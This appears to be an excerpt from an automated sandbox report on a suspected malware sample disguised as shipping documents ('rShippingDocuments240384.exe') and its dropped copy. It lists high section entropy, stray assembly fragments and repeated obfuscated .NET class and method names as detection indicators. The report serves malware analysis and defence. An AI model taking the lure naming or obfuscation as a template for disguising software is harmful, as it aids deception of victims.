Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Code function: 0_2_07C31A0F push esp; retn 0007h	0_2_07C31A12
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Code function: 0_2_07C31910 push esp; retn 0007h	0_2_07C31912
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Code function: 0_2_07C31889 push ebx; retn 0007h	0_2_07C3188A

Source: rShippingDocuments240384.exe	Static PE information: section name: .text entropy: 7.715046701811915
Source: tdcorV.exe.0.dr	Static PE information: section name: .text entropy: 7.715046701811915

Source: 0.2.rShippingDocuments240384.exe.4d31008.2.raw.unpack, iI9pqHAGtVb4t3pvgYZ.cs	High entropy of concatenated method names: 'c03l7ONC3D', 'z9eldvjHkR', 'N0wlsNDG7V', 'ldRlWRKZVa', 'o01lNFRvaT', 'yuLljPqur7', 'SsclaSiS6C', 'YtMlLxHRyr', 'uUnlEBFb7a', 'Sf5lYjKYli'
Source: 0.2.rShippingDocuments240384.exe.4d31008.2.raw.unpack, nDX2exV4Efol9EyBrT.cs	High entropy of concatenated method names: 'VJqsgqPC4', 'nKxWgTDbo', 'RwkjcimEx', 'PQHa0EMe8', 'OEgEmRLtm', 'e05YvtvyZ', 'AXAqX0ptEFeW0fbbEv', 'zsTR5uakseBeCfNNuP', 'UxCkyIPoG', 'Et0gnwy4u'
Source: 0.2.rShippingDocuments240384.exe.4d31008.2.raw.unpack, Xo85XTr6pLMvtWIQEd.cs	High entropy of concatenated method names: 'a17kJA4X7y', 'sUjkHELgng', 'rTKkp7Qrl3', 'z56kO33URh', 'mCukQNDkdn', 'x9ukuJRsEf', 'RVDktWVURp', 'RqKkb6PA16', 'CuOkIrFyNY', 'FtakmQJvwL'
Source: 0.2.rShippingDocuments240384.exe.4d31008.2.raw.unpack, qeqLvo4BFkGiHMAm7Y.cs	High entropy of concatenated method names: 'Jv3u7kAwU4', 'kTZudIBXR2', 'Imlus2X8Om', 'ENMuWKmqX5', 'FRauNvgtif', 'bA5ujcUEmp', 'XeruauGGB7', 'BvXuLyoiyc', 'PuEuEtGEZV', 'vTJuYHLC1l'
Source: 0.2.rShippingDocuments240384.exe.4d31008.2.raw.unpack, CLaABd8aCvmPHd6ibU.cs	High entropy of concatenated method names: 'RFhQii3WKR', 'QsbQH7K8xT', 'S0OQO4VMNY', 'O9AQu23NVl', 'DWqQtVBRa4', 'zC8OnCU9nm', 'nf6O2miVGb', 'cskOcEBo3l', 'EdvOrFtjIv', 'nwoOxqF8dH'
Source: 0.2.rShippingDocuments240384.exe.4d31008.2.raw.unpack, An5xPAAA94KcU6ST43T.cs	High entropy of concatenated method names: 'ToString', 'DH4gq7UXv3', 'IRXgf9rHCC', 'Eskgi7Xh4b', 'hFogJSjtn3', 'o9EgHf810j', 'kb4gpBKiym', 'avTgOQMgn3', 'eVJaDlwZ1aDwG87ABsY', 'tGdnHhwxJPucb1CL6GS'
Source: 0.2.rShippingDocuments240384.exe.4d31008.2.raw.unpack, SAdgCYYLpYY10rKVJB.cs	High entropy of concatenated method names: 'bKjONoY4gx', 'bLOOaaY3Km', 'MOdp5ZK0R4', 'zCVpvjqLPS', 'Ti3pXuH3hj', 'lU7pSuD499', 'JAVp1LylBO', 'hitpydXNUW', 'lVOp4hhQ4w', 'syepwWZL4b'
Source: 0.2.rShippingDocuments240384.exe.4d31008.2.raw.unpack, UV8J1A13b0WyAveFQ9.cs	High entropy of concatenated method names: 'xHNuJTc0fB', 'XV3uphZAlH', 'coDuQZeYpI', 'PgmQo9HtMb', 'K0ZQzNHoIo', 'cTJuGAdp3y', 'MFGuA7Pugh', 'tBZuVnCRbv', 'VkQuqdLLRq', 'nXpufeXcGB'
Source: 0.2.rShippingDocuments240384.exe.4d31008.2.raw.unpack, mXGh2ItvGJ6dBbcXS6.cs	High entropy of concatenated method names: 'Q9Vqi6k3Ki', 'P6QqJsrp1a', 'JR9qHaLqkF', 'zGqqp1Ww4T', 'GUfqOB1Tq6', 'IhXqQkZudW', 'ulSquyMpFa', 'eUoqtRaxgl', 'qmIqbPrPtC', 'VcbqIygAFA'
Source: 0.2.rShippingDocuments240384.exe.4d31008.2.raw.unpack, kSZLAABypvSS9HaSQd.cs	High entropy of concatenated method names: 'w8fTwqLjgP', 'tVPTM3UwRl', 'YusTBDSE4p', 'UXST9DZhoL', 'gyATebsLFu', 'mF0T53qEtL', 'UvfTv6mUXR', 'afiTX4ZKO6', 'f27TSu2GoQ', 'mRXT1cpFvH'
Source: 0.2.rShippingDocuments240384.exe.4d31008.2.raw.unpack, cF51482gRxgBjOXKev.cs	High entropy of concatenated method names: 'zjC0rOwpO8', 'zF60o9KVmm', 'iKrkGcbtaJ', 'bTvkAL1ISr', 'NhZ0ZgVtFg', 'xC00MZmQZB', 'lQK0KUgcKh', 'opY0BI9Oaf', 'XYv09YNo2M', 'e450FIToel'
Source: 0.2.rShippingDocuments240384.exe.4d31008.2.raw.unpack, TB6hxiFXPOcvJ3LAlM.cs	High entropy of concatenated method names: 'ToString', 'V5Q3Zj9jDZ', 'Bdg3e0gjMm', 'URS35GXueh', 'He63vHArsP', 'fHq3XdHrJU', 'cMh3SbfXTB', 'FKX31Va7Lq', 'eIv3ydIw9w', 'WFw347tBm1'
Source: 0.2.rShippingDocuments240384.exe.4d31008.2.raw.unpack, QjYghpfU82Ev6r9qkG.cs	High entropy of concatenated method names: 'f5AAuqiyp6', 'QwnAt3U12a', 'gIhAItxRXq', 'I2JAmfFAdg', 'WKVATJBaLa', 'bBdA3aCvmP', 'VId3PM94jK9NRZo1ta', 'IrCiKDACVWgC8leAIw', 'H7SAAKu1CF', 'j4dAqOrXMY'
Source: 0.2.rShippingDocuments240384.exe.4d31008.2.raw.unpack, bqiyp6LBwn3U12aRJ6.cs	High entropy of concatenated method names: 'A9VHBAdSQ6', 'XF1H9c65Xd', 'dMLHFoa8BK', 'XDcHC9Q0YI', 'r59HnecBqa', 'QvPH2G3UpR', 'J3hHcfeYfi', 'GtiHrsfK0j', 'oY8HxZE1N9', 'e8XHoflAEv'
Source: 0.2.rShippingDocuments240384.exe.4d31008.2.raw.unpack, F3OmGHEIhtxRXq52Jf.cs	High entropy of concatenated method names: 'TYIpWlKluy', 'vctpjMhJWC', 'pqTpLdMRPi', 'gq5pE3oiWd', 'qDlpTQO0L7', 'KW9p3JAG1c', 'uQgp0cljwV', 'Ra5pkIiMff', 'Kv9plhPPjW', 'ipLpgbyEyM'
Source: 0.2.rShippingDocuments240384.exe.4d31008.2.raw.unpack, PVHmyBzNKgLOkVG9DC.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'hDFlRqLCPF', 'CfFlTui5hD', 'LW9l35Mufn', 'hH2l02NtTJ', 'UWglknDhXi', 'v4Dllqkfny', 'CBnlgGGBC2'
Source: 0.2.rShippingDocuments240384.exe.4d31008.2.raw.unpack, yXBUahHsaeO5hhL8ov.cs	High entropy of concatenated method names: 'Dispose', 'xK9AxE9GgX', 'bYYVeIk1K0', 'O4w227qH2k', 'FxoAo85XT6', 'hLMAzvtWIQ', 'ProcessDialogKey', 'EdDVGftO49', 'n6bVAPiYX0', 'zeZVVWZSeL'
Source: 0.2.rShippingDocuments240384.exe.4d31008.2.raw.unpack, AZSeLWoXNU2Em3evrk.cs	High entropy of concatenated method names: 'NxOlA9d56J', 'SMblqWuoES', 'NyhlfjXOs7', 'HnflJrmkeJ', 'enflHpgj7I', 'hNhlOt8SWs', 'nOxlQkAwP0', 'knskcoMEXa', 'WUxkrVlGTL', 'AE5kxDLu9V'
Source: 0.2.rShippingDocuments240384.exe.4d31008.2.raw.unpack, p0Jk0tplFOaPDwPQ51.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'MSfVxUmlRS', 'kRDVo1068K', 'jWGVzh2pem', 'TZ5qGXZYPV', 'k4oqAmvKIX', 'yVAqVKnqkg', 'RCXqq2fwoS', 'qOgBeDg29wfL5UmmJny'
Source: 0.2.rShippingDocuments240384.exe.4d31008.2.raw.unpack, DASuTkAqRlUt9qBnSNq.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'xhBgBHJfQX', 'D7xg91FCCc', 'IxRgFb3GjV', 'u67gCGr9Sl', 's7UgnFRiVn', 'eyfg2Txh8G', 'H7igcuqDUN'
Source: 0.2.rShippingDocuments240384.exe.4d31008.2.raw.unpack, TDSE3NKycqKSaNDhhn.cs	High entropy of concatenated method names: 'k4vRLK00kR', 'hi4RE0qmRn', 'Dj0R8nRAbX', 'CKKRe15MQd', 'SKxRvWwJJO', 'bY3RXDnQhe', 'o75R1jiNF0', 'NuDRyv9w9G', 'jU6RwQn63d', 'SeWRZrr9k7'
Source: 0.2.rShippingDocuments240384.exe.4d31008.2.raw.unpack, uftO49xR6bPiYX0WeZ.cs	High entropy of concatenated method names: 'vYTk8jmdak', 'EgXkeyLJBb', 'BVyk5X7BoQ', 'SxFkvOAs9a', 'LeKkBUymF2', 'DONkXMydHu', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.rShippingDocuments240384.exe.4db5a28.0.raw.unpack, iI9pqHAGtVb4t3pvgYZ.cs	High entropy of concatenated method names: 'c03l7ONC3D', 'z9eldvjHkR', 'N0wlsNDG7V', 'ldRlWRKZVa', 'o01lNFRvaT', 'yuLljPqur7', 'SsclaSiS6C', 'YtMlLxHRyr', 'uUnlEBFb7a', 'Sf5lYjKYli'
Source: 0.2.rShippingDocuments240384.exe.4db5a28.0.raw.unpack, nDX2exV4Efol9EyBrT.cs	High entropy of concatenated method names: 'VJqsgqPC4', 'nKxWgTDbo', 'RwkjcimEx', 'PQHa0EMe8', 'OEgEmRLtm', 'e05YvtvyZ', 'AXAqX0ptEFeW0fbbEv', 'zsTR5uakseBeCfNNuP', 'UxCkyIPoG', 'Et0gnwy4u'
Source: 0.2.rShippingDocuments240384.exe.4db5a28.0.raw.unpack, Xo85XTr6pLMvtWIQEd.cs	High entropy of concatenated method names: 'a17kJA4X7y', 'sUjkHELgng', 'rTKkp7Qrl3', 'z56kO33URh', 'mCukQNDkdn', 'x9ukuJRsEf', 'RVDktWVURp', 'RqKkb6PA16', 'CuOkIrFyNY', 'FtakmQJvwL'
Source: 0.2.rShippingDocuments240384.exe.4db5a28.0.raw.unpack, qeqLvo4BFkGiHMAm7Y.cs	High entropy of concatenated method names: 'Jv3u7kAwU4', 'kTZudIBXR2', 'Imlus2X8Om', 'ENMuWKmqX5', 'FRauNvgtif', 'bA5ujcUEmp', 'XeruauGGB7', 'BvXuLyoiyc', 'PuEuEtGEZV', 'vTJuYHLC1l'
Source: 0.2.rShippingDocuments240384.exe.4db5a28.0.raw.unpack, CLaABd8aCvmPHd6ibU.cs	High entropy of concatenated method names: 'RFhQii3WKR', 'QsbQH7K8xT', 'S0OQO4VMNY', 'O9AQu23NVl', 'DWqQtVBRa4', 'zC8OnCU9nm', 'nf6O2miVGb', 'cskOcEBo3l', 'EdvOrFtjIv', 'nwoOxqF8dH'
Source: 0.2.rShippingDocuments240384.exe.4db5a28.0.raw.unpack, An5xPAAA94KcU6ST43T.cs	High entropy of concatenated method names: 'ToString', 'DH4gq7UXv3', 'IRXgf9rHCC', 'Eskgi7Xh4b', 'hFogJSjtn3', 'o9EgHf810j', 'kb4gpBKiym', 'avTgOQMgn3', 'eVJaDlwZ1aDwG87ABsY', 'tGdnHhwxJPucb1CL6GS'
Source: 0.2.rShippingDocuments240384.exe.4db5a28.0.raw.unpack, SAdgCYYLpYY10rKVJB.cs	High entropy of concatenated method names: 'bKjONoY4gx', 'bLOOaaY3Km', 'MOdp5ZK0R4', 'zCVpvjqLPS', 'Ti3pXuH3hj', 'lU7pSuD499', 'JAVp1LylBO', 'hitpydXNUW', 'lVOp4hhQ4w', 'syepwWZL4b'
Source: 0.2.rShippingDocuments240384.exe.4db5a28.0.raw.unpack, UV8J1A13b0WyAveFQ9.cs	High entropy of concatenated method names: 'xHNuJTc0fB', 'XV3uphZAlH', 'coDuQZeYpI', 'PgmQo9HtMb', 'K0ZQzNHoIo', 'cTJuGAdp3y', 'MFGuA7Pugh', 'tBZuVnCRbv', 'VkQuqdLLRq', 'nXpufeXcGB'
Source: 0.2.rShippingDocuments240384.exe.4db5a28.0.raw.unpack, mXGh2ItvGJ6dBbcXS6.cs	High entropy of concatenated method names: 'Q9Vqi6k3Ki', 'P6QqJsrp1a', 'JR9qHaLqkF', 'zGqqp1Ww4T', 'GUfqOB1Tq6', 'IhXqQkZudW', 'ulSquyMpFa', 'eUoqtRaxgl', 'qmIqbPrPtC', 'VcbqIygAFA'
Source: 0.2.rShippingDocuments240384.exe.4db5a28.0.raw.unpack, kSZLAABypvSS9HaSQd.cs	High entropy of concatenated method names: 'w8fTwqLjgP', 'tVPTM3UwRl', 'YusTBDSE4p', 'UXST9DZhoL', 'gyATebsLFu', 'mF0T53qEtL', 'UvfTv6mUXR', 'afiTX4ZKO6', 'f27TSu2GoQ', 'mRXT1cpFvH'
Source: 0.2.rShippingDocuments240384.exe.4db5a28.0.raw.unpack, cF51482gRxgBjOXKev.cs	High entropy of concatenated method names: 'zjC0rOwpO8', 'zF60o9KVmm', 'iKrkGcbtaJ', 'bTvkAL1ISr', 'NhZ0ZgVtFg', 'xC00MZmQZB', 'lQK0KUgcKh', 'opY0BI9Oaf', 'XYv09YNo2M', 'e450FIToel'
Source: 0.2.rShippingDocuments240384.exe.4db5a28.0.raw.unpack, TB6hxiFXPOcvJ3LAlM.cs	High entropy of concatenated method names: 'ToString', 'V5Q3Zj9jDZ', 'Bdg3e0gjMm', 'URS35GXueh', 'He63vHArsP', 'fHq3XdHrJU', 'cMh3SbfXTB', 'FKX31Va7Lq', 'eIv3ydIw9w', 'WFw347tBm1'
Source: 0.2.rShippingDocuments240384.exe.4db5a28.0.raw.unpack, QjYghpfU82Ev6r9qkG.cs	High entropy of concatenated method names: 'f5AAuqiyp6', 'QwnAt3U12a', 'gIhAItxRXq', 'I2JAmfFAdg', 'WKVATJBaLa', 'bBdA3aCvmP', 'VId3PM94jK9NRZo1ta', 'IrCiKDACVWgC8leAIw', 'H7SAAKu1CF', 'j4dAqOrXMY'
Source: 0.2.rShippingDocuments240384.exe.4db5a28.0.raw.unpack, bqiyp6LBwn3U12aRJ6.cs	High entropy of concatenated method names: 'A9VHBAdSQ6', 'XF1H9c65Xd', 'dMLHFoa8BK', 'XDcHC9Q0YI', 'r59HnecBqa', 'QvPH2G3UpR', 'J3hHcfeYfi', 'GtiHrsfK0j', 'oY8HxZE1N9', 'e8XHoflAEv'
Source: 0.2.rShippingDocuments240384.exe.4db5a28.0.raw.unpack, F3OmGHEIhtxRXq52Jf.cs	High entropy of concatenated method names: 'TYIpWlKluy', 'vctpjMhJWC', 'pqTpLdMRPi', 'gq5pE3oiWd', 'qDlpTQO0L7', 'KW9p3JAG1c', 'uQgp0cljwV', 'Ra5pkIiMff', 'Kv9plhPPjW', 'ipLpgbyEyM'
Source: 0.2.rShippingDocuments240384.exe.4db5a28.0.raw.unpack, PVHmyBzNKgLOkVG9DC.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'hDFlRqLCPF', 'CfFlTui5hD', 'LW9l35Mufn', 'hH2l02NtTJ', 'UWglknDhXi', 'v4Dllqkfny', 'CBnlgGGBC2'
Source: 0.2.rShippingDocuments240384.exe.4db5a28.0.raw.unpack, yXBUahHsaeO5hhL8ov.cs	High entropy of concatenated method names: 'Dispose', 'xK9AxE9GgX', 'bYYVeIk1K0', 'O4w227qH2k', 'FxoAo85XT6', 'hLMAzvtWIQ', 'ProcessDialogKey', 'EdDVGftO49', 'n6bVAPiYX0', 'zeZVVWZSeL'
Source: 0.2.rShippingDocuments240384.exe.4db5a28.0.raw.unpack, AZSeLWoXNU2Em3evrk.cs	High entropy of concatenated method names: 'NxOlA9d56J', 'SMblqWuoES', 'NyhlfjXOs7', 'HnflJrmkeJ', 'enflHpgj7I', 'hNhlOt8SWs', 'nOxlQkAwP0', 'knskcoMEXa', 'WUxkrVlGTL', 'AE5kxDLu9V'
Source: 0.2.rShippingDocuments240384.exe.4db5a28.0.raw.unpack, p0Jk0tplFOaPDwPQ51.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'MSfVxUmlRS', 'kRDVo1068K', 'jWGVzh2pem', 'TZ5qGXZYPV', 'k4oqAmvKIX', 'yVAqVKnqkg', 'RCXqq2fwoS', 'qOgBeDg29wfL5UmmJny'
Source: 0.2.rShippingDocuments240384.exe.4db5a28.0.raw.unpack, DASuTkAqRlUt9qBnSNq.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'xhBgBHJfQX', 'D7xg91FCCc', 'IxRgFb3GjV', 'u67gCGr9Sl', 's7UgnFRiVn', 'eyfg2Txh8G', 'H7igcuqDUN'
Source: 0.2.rShippingDocuments240384.exe.4db5a28.0.raw.unpack, TDSE3NKycqKSaNDhhn.cs	High entropy of concatenated method names: 'k4vRLK00kR', 'hi4RE0qmRn', 'Dj0R8nRAbX', 'CKKRe15MQd', 'SKxRvWwJJO', 'bY3RXDnQhe', 'o75R1jiNF0', 'NuDRyv9w9G', 'jU6RwQn63d', 'SeWRZrr9k7'
Source: 0.2.rShippingDocuments240384.exe.4db5a28.0.raw.unpack, uftO49xR6bPiYX0WeZ.cs	High entropy of concatenated method names: 'vYTk8jmdak', 'EgXkeyLJBb', 'BVyk5X7BoQ', 'SxFkvOAs9a', 'LeKkBUymF2', 'DONkXMydHu', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.rShippingDocuments240384.exe.9650000.4.raw.unpack, iI9pqHAGtVb4t3pvgYZ.cs	High entropy of concatenated method names: 'c03l7ONC3D', 'z9eldvjHkR', 'N0wlsNDG7V', 'ldRlWRKZVa', 'o01lNFRvaT', 'yuLljPqur7', 'SsclaSiS6C', 'YtMlLxHRyr', 'uUnlEBFb7a', 'Sf5lYjKYli'
Source: 0.2.rShippingDocuments240384.exe.9650000.4.raw.unpack, nDX2exV4Efol9EyBrT.cs	High entropy of concatenated method names: 'VJqsgqPC4', 'nKxWgTDbo', 'RwkjcimEx', 'PQHa0EMe8', 'OEgEmRLtm', 'e05YvtvyZ', 'AXAqX0ptEFeW0fbbEv', 'zsTR5uakseBeCfNNuP', 'UxCkyIPoG', 'Et0gnwy4u'
Source: 0.2.rShippingDocuments240384.exe.9650000.4.raw.unpack, Xo85XTr6pLMvtWIQEd.cs	High entropy of concatenated method names: 'a17kJA4X7y', 'sUjkHELgng', 'rTKkp7Qrl3', 'z56kO33URh', 'mCukQNDkdn', 'x9ukuJRsEf', 'RVDktWVURp', 'RqKkb6PA16', 'CuOkIrFyNY', 'FtakmQJvwL'
Source: 0.2.rShippingDocuments240384.exe.9650000.4.raw.unpack, qeqLvo4BFkGiHMAm7Y.cs	High entropy of concatenated method names: 'Jv3u7kAwU4', 'kTZudIBXR2', 'Imlus2X8Om', 'ENMuWKmqX5', 'FRauNvgtif', 'bA5ujcUEmp', 'XeruauGGB7', 'BvXuLyoiyc', 'PuEuEtGEZV', 'vTJuYHLC1l'
Source: 0.2.rShippingDocuments240384.exe.9650000.4.raw.unpack, CLaABd8aCvmPHd6ibU.cs	High entropy of concatenated method names: 'RFhQii3WKR', 'QsbQH7K8xT', 'S0OQO4VMNY', 'O9AQu23NVl', 'DWqQtVBRa4', 'zC8OnCU9nm', 'nf6O2miVGb', 'cskOcEBo3l', 'EdvOrFtjIv', 'nwoOxqF8dH'
Source: 0.2.rShippingDocuments240384.exe.9650000.4.raw.unpack, An5xPAAA94KcU6ST43T.cs	High entropy of concatenated method names: 'ToString', 'DH4gq7UXv3', 'IRXgf9rHCC', 'Eskgi7Xh4b', 'hFogJSjtn3', 'o9EgHf810j', 'kb4gpBKiym', 'avTgOQMgn3', 'eVJaDlwZ1aDwG87ABsY', 'tGdnHhwxJPucb1CL6GS'
Source: 0.2.rShippingDocuments240384.exe.9650000.4.raw.unpack, SAdgCYYLpYY10rKVJB.cs	High entropy of concatenated method names: 'bKjONoY4gx', 'bLOOaaY3Km', 'MOdp5ZK0R4', 'zCVpvjqLPS', 'Ti3pXuH3hj', 'lU7pSuD499', 'JAVp1LylBO', 'hitpydXNUW', 'lVOp4hhQ4w', 'syepwWZL4b'
Source: 0.2.rShippingDocuments240384.exe.9650000.4.raw.unpack, UV8J1A13b0WyAveFQ9.cs	High entropy of concatenated method names: 'xHNuJTc0fB', 'XV3uphZAlH', 'coDuQZeYpI', 'PgmQo9HtMb', 'K0ZQzNHoIo', 'cTJuGAdp3y', 'MFGuA7Pugh', 'tBZuVnCRbv', 'VkQuqdLLRq', 'nXpufeXcGB'
Source: 0.2.rShippingDocuments240384.exe.9650000.4.raw.unpack, mXGh2ItvGJ6dBbcXS6.cs	High entropy of concatenated method names: 'Q9Vqi6k3Ki', 'P6QqJsrp1a', 'JR9qHaLqkF', 'zGqqp1Ww4T', 'GUfqOB1Tq6', 'IhXqQkZudW', 'ulSquyMpFa', 'eUoqtRaxgl', 'qmIqbPrPtC', 'VcbqIygAFA'
Source: 0.2.rShippingDocuments240384.exe.9650000.4.raw.unpack, kSZLAABypvSS9HaSQd.cs	High entropy of concatenated method names: 'w8fTwqLjgP', 'tVPTM3UwRl', 'YusTBDSE4p', 'UXST9DZhoL', 'gyATebsLFu', 'mF0T53qEtL', 'UvfTv6mUXR', 'afiTX4ZKO6', 'f27TSu2GoQ', 'mRXT1cpFvH'
Source: 0.2.rShippingDocuments240384.exe.9650000.4.raw.unpack, cF51482gRxgBjOXKev.cs	High entropy of concatenated method names: 'zjC0rOwpO8', 'zF60o9KVmm', 'iKrkGcbtaJ', 'bTvkAL1ISr', 'NhZ0ZgVtFg', 'xC00MZmQZB', 'lQK0KUgcKh', 'opY0BI9Oaf', 'XYv09YNo2M', 'e450FIToel'
Source: 0.2.rShippingDocuments240384.exe.9650000.4.raw.unpack, TB6hxiFXPOcvJ3LAlM.cs	High entropy of concatenated method names: 'ToString', 'V5Q3Zj9jDZ', 'Bdg3e0gjMm', 'URS35GXueh', 'He63vHArsP', 'fHq3XdHrJU', 'cMh3SbfXTB', 'FKX31Va7Lq', 'eIv3ydIw9w', 'WFw347tBm1'
Source: 0.2.rShippingDocuments240384.exe.9650000.4.raw.unpack, QjYghpfU82Ev6r9qkG.cs	High entropy of concatenated method names: 'f5AAuqiyp6', 'QwnAt3U12a', 'gIhAItxRXq', 'I2JAmfFAdg', 'WKVATJBaLa', 'bBdA3aCvmP', 'VId3PM94jK9NRZo1ta', 'IrCiKDACVWgC8leAIw', 'H7SAAKu1CF', 'j4dAqOrXMY'
Source: 0.2.rShippingDocuments240384.exe.9650000.4.raw.unpack, bqiyp6LBwn3U12aRJ6.cs	High entropy of concatenated method names: 'A9VHBAdSQ6', 'XF1H9c65Xd', 'dMLHFoa8BK', 'XDcHC9Q0YI', 'r59HnecBqa', 'QvPH2G3UpR', 'J3hHcfeYfi', 'GtiHrsfK0j', 'oY8HxZE1N9', 'e8XHoflAEv'
Source: 0.2.rShippingDocuments240384.exe.9650000.4.raw.unpack, F3OmGHEIhtxRXq52Jf.cs	High entropy of concatenated method names: 'TYIpWlKluy', 'vctpjMhJWC', 'pqTpLdMRPi', 'gq5pE3oiWd', 'qDlpTQO0L7', 'KW9p3JAG1c', 'uQgp0cljwV', 'Ra5pkIiMff', 'Kv9plhPPjW', 'ipLpgbyEyM'
Source: 0.2.rShippingDocuments240384.exe.9650000.4.raw.unpack, PVHmyBzNKgLOkVG9DC.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'hDFlRqLCPF', 'CfFlTui5hD', 'LW9l35Mufn', 'hH2l02NtTJ', 'UWglknDhXi', 'v4Dllqkfny', 'CBnlgGGBC2'
Source: 0.2.rShippingDocuments240384.exe.9650000.4.raw.unpack, yXBUahHsaeO5hhL8ov.cs	High entropy of concatenated method names: 'Dispose', 'xK9AxE9GgX', 'bYYVeIk1K0', 'O4w227qH2k', 'FxoAo85XT6', 'hLMAzvtWIQ', 'ProcessDialogKey', 'EdDVGftO49', 'n6bVAPiYX0', 'zeZVVWZSeL'
Source: 0.2.rShippingDocuments240384.exe.9650000.4.raw.unpack, AZSeLWoXNU2Em3evrk.cs	High entropy of concatenated method names: 'NxOlA9d56J', 'SMblqWuoES', 'NyhlfjXOs7', 'HnflJrmkeJ', 'enflHpgj7I', 'hNhlOt8SWs', 'nOxlQkAwP0', 'knskcoMEXa', 'WUxkrVlGTL', 'AE5kxDLu9V'
Source: 0.2.rShippingDocuments240384.exe.9650000.4.raw.unpack, p0Jk0tplFOaPDwPQ51.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'MSfVxUmlRS', 'kRDVo1068K', 'jWGVzh2pem', 'TZ5qGXZYPV', 'k4oqAmvKIX', 'yVAqVKnqkg', 'RCXqq2fwoS', 'qOgBeDg29wfL5UmmJny'
Source: 0.2.rShippingDocuments240384.exe.9650000.4.raw.unpack, DASuTkAqRlUt9qBnSNq.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'xhBgBHJfQX', 'D7xg91FCCc', 'IxRgFb3GjV', 'u67gCGr9Sl', 's7UgnFRiVn', 'eyfg2Txh8G', 'H7igcuqDUN'
Source: 0.2.rShippingDocuments240384.exe.9650000.4.raw.unpack, TDSE3NKycqKSaNDhhn.cs	High entropy of concatenated method names: 'k4vRLK00kR', 'hi4RE0qmRn', 'Dj0R8nRAbX', 'CKKRe15MQd', 'SKxRvWwJJO', 'bY3RXDnQhe', 'o75R1jiNF0', 'NuDRyv9w9G', 'jU6RwQn63d', 'SeWRZrr9k7'
Source: 0.2.rShippingDocuments240384.exe.9650000.4.raw.unpack, uftO49xR6bPiYX0WeZ.cs	High entropy of concatenated method names: 'vYTk8jmdak', 'EgXkeyLJBb', 'BVyk5X7BoQ', 'SxFkvOAs9a', 'LeKkBUymF2', 'DONkXMydHu', 'Next', 'Next', 'Next', 'NextBytes'
Source: 10.2.tdcorV.exe.45b2080.2.raw.unpack, iI9pqHAGtVb4t3pvgYZ.cs	High entropy of concatenated method names: 'c03l7ONC3D', 'z9eldvjHkR', 'N0wlsNDG7V', 'ldRlWRKZVa', 'o01lNFRvaT', 'yuLljPqur7', 'SsclaSiS6C', 'YtMlLxHRyr', 'uUnlEBFb7a', 'Sf5lYjKYli'
Source: 10.2.tdcorV.exe.45b2080.2.raw.unpack, nDX2exV4Efol9EyBrT.cs	High entropy of concatenated method names: 'VJqsgqPC4', 'nKxWgTDbo', 'RwkjcimEx', 'PQHa0EMe8', 'OEgEmRLtm', 'e05YvtvyZ', 'AXAqX0ptEFeW0fbbEv', 'zsTR5uakseBeCfNNuP', 'UxCkyIPoG', 'Et0gnwy4u'
Source: 10.2.tdcorV.exe.45b2080.2.raw.unpack, Xo85XTr6pLMvtWIQEd.cs	High entropy of concatenated method names: 'a17kJA4X7y', 'sUjkHELgng', 'rTKkp7Qrl3', 'z56kO33URh', 'mCukQNDkdn', 'x9ukuJRsEf', 'RVDktWVURp', 'RqKkb6PA16', 'CuOkIrFyNY', 'FtakmQJvwL'
Source: 10.2.tdcorV.exe.45b2080.2.raw.unpack, qeqLvo4BFkGiHMAm7Y.cs	High entropy of concatenated method names: 'Jv3u7kAwU4', 'kTZudIBXR2', 'Imlus2X8Om', 'ENMuWKmqX5', 'FRauNvgtif', 'bA5ujcUEmp', 'XeruauGGB7', 'BvXuLyoiyc', 'PuEuEtGEZV', 'vTJuYHLC1l'
Source: 10.2.tdcorV.exe.45b2080.2.raw.unpack, CLaABd8aCvmPHd6ibU.cs	High entropy of concatenated method names: 'RFhQii3WKR', 'QsbQH7K8xT', 'S0OQO4VMNY', 'O9AQu23NVl', 'DWqQtVBRa4', 'zC8OnCU9nm', 'nf6O2miVGb', 'cskOcEBo3l', 'EdvOrFtjIv', 'nwoOxqF8dH'
Source: 10.2.tdcorV.exe.45b2080.2.raw.unpack, An5xPAAA94KcU6ST43T.cs	High entropy of concatenated method names: 'ToString', 'DH4gq7UXv3', 'IRXgf9rHCC', 'Eskgi7Xh4b', 'hFogJSjtn3', 'o9EgHf810j', 'kb4gpBKiym', 'avTgOQMgn3', 'eVJaDlwZ1aDwG87ABsY', 'tGdnHhwxJPucb1CL6GS'
Source: 10.2.tdcorV.exe.45b2080.2.raw.unpack, SAdgCYYLpYY10rKVJB.cs	High entropy of concatenated method names: 'bKjONoY4gx', 'bLOOaaY3Km', 'MOdp5ZK0R4', 'zCVpvjqLPS', 'Ti3pXuH3hj', 'lU7pSuD499', 'JAVp1LylBO', 'hitpydXNUW', 'lVOp4hhQ4w', 'syepwWZL4b'
Source: 10.2.tdcorV.exe.45b2080.2.raw.unpack, UV8J1A13b0WyAveFQ9.cs	High entropy of concatenated method names: 'xHNuJTc0fB', 'XV3uphZAlH', 'coDuQZeYpI', 'PgmQo9HtMb', 'K0ZQzNHoIo', 'cTJuGAdp3y', 'MFGuA7Pugh', 'tBZuVnCRbv', 'VkQuqdLLRq', 'nXpufeXcGB'
Source: 10.2.tdcorV.exe.45b2080.2.raw.unpack, mXGh2ItvGJ6dBbcXS6.cs	High entropy of concatenated method names: 'Q9Vqi6k3Ki', 'P6QqJsrp1a', 'JR9qHaLqkF', 'zGqqp1Ww4T', 'GUfqOB1Tq6', 'IhXqQkZudW', 'ulSquyMpFa', 'eUoqtRaxgl', 'qmIqbPrPtC', 'VcbqIygAFA'
